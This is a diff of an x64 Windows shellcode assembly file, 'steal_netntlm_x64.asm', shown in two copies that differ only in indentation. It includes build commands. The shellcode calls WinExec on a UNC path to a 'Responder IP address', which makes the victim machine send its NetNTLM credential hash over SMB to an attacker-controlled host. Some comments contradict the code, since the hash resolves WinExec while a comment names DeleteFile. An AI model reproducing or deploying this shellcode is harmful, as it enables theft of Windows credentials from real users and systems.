EgeBalci · June 26, 2019 18:09
diff --git a/steal_netntlm_x64.asm b/steal_netntlm_x64.asm
 ;-----------------------------------------------------------------------------;
 ; Author: Ege Balcı (egebalci[at]pm[dot]me)
 ; Compatible: All Windows versions with SMBv2/v1
 ; Architecture: x64
 ; Size: 265 + strlen(IP) + 1
 ; Build: nasm -f bin steal_netntlm_x64.asm -o shellcode && xxd -i shellcode
 ;-----------------------------------------------------------------------------;

 [BITS 64]
 [ORG 0]

 	cld                      ; Clear the direction flag.
 	call start               ; Call start, this pushes the address of 'api_call' onto the stack.
 	%include "block_api.asm" ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm 
 start:                       ;
 	pop rbp                  ; Pop off the address of 'api_call' for calling later.
 	call get_api             ;
 	db "\\1.1.1.1\x",0       ; Responder IP address
 get_api:                     ;
 	pop rcx                  ; Pop IP string address to RCX
 	mov r10d, 0x13DD2ED7     ; hash( "kernel32.dll", "WinExec" )
 	call rbp                 ; DeleteFile("\\1.1.1.1\x");
 exitfunk:                    ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x64/src/block/block_exitfunk.asm
 	mov ebx, 0x0A2A1DE0      ; The EXITFUNK as specified by user...
 	mov r10d, 0x9DBD95A6     ; hash( "kernel32.dll", "GetVersion" )
 	call rbp                 ; GetVersion(); (AL will = major version and AH will = minor version)
 	add rsp, 40              ; cleanup the default param space on stack
 	cmp al, byte 6           ; If we are not running on Windows Vista, 2008 or 7
 	jl short goodbye         ; Then just call the exit function...
 	cmp bl, 0xE0             ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
 	jne short goodbye        ;
 	mov ebx, 0x6F721347      ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
 goodbye:                     ; We now perform the actual call to the exit function
 	push byte 0              ;
 	pop rcx                  ; set the exit function parameter
 	mov r10d, ebx            ; place the correct EXITFUNK into r10d
 	call rbp                 ; call EXITFUNK( 0 );i
	;-----------------------------------------------------------------------------;
	; Author: Ege Balcı (egebalci[at]pm[dot]me)
	; Compatible: All Windows versions with SMBv2/v1
	; Architecture: x64
	; Size: 265 + strlen(IP) + 1
	; Build: nasm -f bin steal_netntlm_x64.asm -o shellcode && xxd -i shellcode
	;-----------------------------------------------------------------------------;

	[BITS 64]
	[ORG 0]

	cld ; Clear the direction flag.
	call start ; Call start, this pushes the address of 'api_call' onto the stack.
	%include "block_api.asm" ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
	start: ;
	pop rbp ; Pop off the address of 'api_call' for calling later.
	call get_api ;
	db "\\1.1.1.1\x",0 ; Responder IP address
	get_api: ;
	pop rcx ; Pop IP string address to RCX
	mov r10d, 0x13DD2ED7 ; hash( "kernel32.dll", "WinExec" )
	call rbp ; DeleteFile("\\1.1.1.1\x");
	exitfunk: ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x64/src/block/block_exitfunk.asm
	mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
	mov r10d, 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
	call rbp ; GetVersion(); (AL will = major version and AH will = minor version)
	add rsp, 40 ; cleanup the default param space on stack
	cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
	jl short goodbye ; Then just call the exit function...
	cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
	jne short goodbye ;
	mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
	goodbye: ; We now perform the actual call to the exit function
	push byte 0 ;
	pop rcx ; set the exit function parameter
	mov r10d, ebx ; place the correct EXITFUNK into r10d
	call rbp ; call EXITFUNK( 0 );i